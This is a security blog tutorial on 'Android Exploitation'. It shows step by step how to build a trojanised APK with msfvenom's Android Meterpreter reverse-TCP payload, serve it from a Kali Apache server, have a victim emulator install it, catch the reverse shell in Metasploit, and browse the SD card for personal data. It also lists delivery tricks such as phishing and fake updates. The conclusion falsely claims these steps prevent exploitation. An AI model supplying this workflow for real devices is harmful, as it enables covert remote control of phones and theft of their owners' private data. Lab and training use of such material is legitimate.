Stratos Ally

Subscribe
Subscribe
Facebook-square Instagram Linkedin Youtube X-twitter

Android Exploitation 

Picture of StratosAlly

StratosAlly

Facebook-square Instagram Linkedin Youtube X-twitter
Android Exploitation

**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.** 

Before start with Android Exploitation 

Lets see first Android – an operating system (OS) built on the Linux kernel, has become a powerhouse in mobile technology. Android Inc. first developed it, but Google bought the company in 2005. Android launched in 2007, simultaneously with the creation of the Open Handset Alliance, a group of hardware, software, and telecom companies. Since then, Android has grown quickly, changing how we use mobile devices and interact with the digital world.


In this guide, we’ll explore how to create an APK file using Kali Linux’s tools. Kali Linux has many hacking tools and frameworks for different stages of pen testing. We’ll use Metasploit’s Android payloads and the msfvenom tool to create the APK file.

Here, we are going to exploit Android-x86 4.4-r4.

Download the android-x86 4.4-r4 from here. 

https://drive.google.com/file/d/1D8v7JAwByzZvRxZBKYRekWCqL7nHxv-E/view?usp=sharing

Msfvenom is a command-line tool in the Metasploit Framework that helps create payloads. You can use it to make custom payloads for different platforms and architectures.

Msfvenom is a flexible payload generator in Metasploit, a top open-source penetration testing framework. It lets users build payloads for many architectures, operating systems, and delivery methods. Whether you’re targeting Windows, Linux, macOS, or mobile platforms, Msfvenom allows you to design payloads that fit various exploitation needs.

We have to create a fake APK file. 

Step 1: We have to create a fake APK file. Use msfvenom to create a payload. 

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP of your machine> LPORT=1234 -o <name of payload> i.e yam.apk

Kali Linux often serves as a web server to host websites and web apps. Linux stands out as an open-source platform, allowing users to tweak the system as they see fit. This adaptability makes Linux a top pick for server setups. For example, coders can grab code from repositories, tweak source code, and build their own kernel versions.

Bad actors employ several tricks to spread bogus apps in Kali Linux. Here’s a list of common methods:

  1. Phishing Emails
  2. Malicious Websites
  3. Social Engineering
  4. Third-party App Stores
  5. Compromised Legitimate Applications
  6. Free Software Bundles
  7. Fake updates

Step 2: Make your Kali Linux a Server. To make a server use the following commands. 

$ service apache2 start

To check the status write

$ service apache2 status

Step 3: We have to copy the payload to the hosted directory of Kali Linux. 

 $ cp yam.apk  /var/www/html 

  The cp yam.apk /var/www/html command copies a file called yam.apk to the /var/www/html folder. Linux systems use cp to copy files and folders. Here, yam.apk is the file you want to copy, and /var/www/html is where you want to put it. When you run this command, it moves yam.apk into the web server’s main folder. This lets the web server access and share the file. It’s handy to place files in this spot when you need them to be available on a website.

Step 4: Now we have to open Android and the browser. 

$ type 192.168.64.144<ip of kali linux>/yam.apk<name of payload>

Why use the browser to handle APK files:

People often use web browsers to get APK files from websites. They can download these files straight to their Android devices to install them or save them on a computer to move later. Developers and security experts may want to look inside an APK file. They can use web-based tools and services for this, like APK Analyzer or online virus checkers. These tools can examine what’s in the APK and how it behaves.

Many websites have APK files ready to download. Users just go to these sites with their browsers to get the files. Also, some online emulators and testing platforms let developers upload APK files through a browser. These platforms create a fake Android environment, so developers can test their apps right in the browser.

Step 5: The APK file gets downloaded automatically.

Step 6: When you click the yam.apk file, it installs on the emulator. To open the app, go to the MainActivity app on your device and start it. Once you open the app, a meterpreter shell should connect to your device, to set up a meterpreter session.

Step 7: To connect with the mobile device, we’ll use the Metasploit Framework. This open-source tool packs a punch when it comes to testing weak spots looking for vulnerabilities, and breaking into systems. Rapid7 created it, giving security experts and ethical hackers a complete platform to check and improve the safety of networks and applications.

Step 8: To open the Metasploit framework 

$ msfconsole -q 

We shall open the MSF console to create a listener for our exploit. 

$ use exploit/multi/handler 

$ set payload android/meterpreter/reverse_tcp

$ show options

This multi/handler exploit listens for an incoming connection.

The multi/handler exploit in Metasploit helps manage and connect to payloads that Metasploit creates, like reverse shells or Meterpreter sessions.

Step 9: Set LHOST and LPORT and run the exploit 

$ set LHOST <ip of kali linux>

$ set LPORT <1234> 

$ run

LHOST: Tells you where to set your own IP address. This is the place the target device will connect to.

LPORT: Picks the local port to watch. This port needs to match the one you chose when you made the payload.

RHOST (Remote Host) and RPORT (Remote Port) come into play in exploit modules that reach out to a remote target to take advantage of weak spots. On the flip side, multi/handler acts as a watcher that sits and waits for the payload to call in. That’s why it uses LHOST and LPORT instead.

Step 10: Here, we have a meterpreter session. A Meterpreter session connects back to your Metasploit instance giving you remote access to the device.

A Meterpreter session is a high-level interactive command-line interface that Metasploit offers. When a payload links to your Metasploit instance, it creates a Meterpreter session. This allows you to control and interact with the compromised device from afar. The session provides a variety of tools to explore, exploit, and carry out post-exploitation tasks. You can manage files, get system info, and run commands, among other things.

$ cd /

$ ls

Step 11: Open SD card.

Since SD cards contain lots of personal information, we moved to SD cards to get information. 

$ cd sdcard

$ ls

And it’s open. 

Conclusion:

Using these steps you can easily prevent from Android Exploitation. To enhance your Android device’s safety, implement defensive security by using strong passwords, enabling biometric locks, keeping software updated, and using antivirus protection.

more Related articles

READ ALL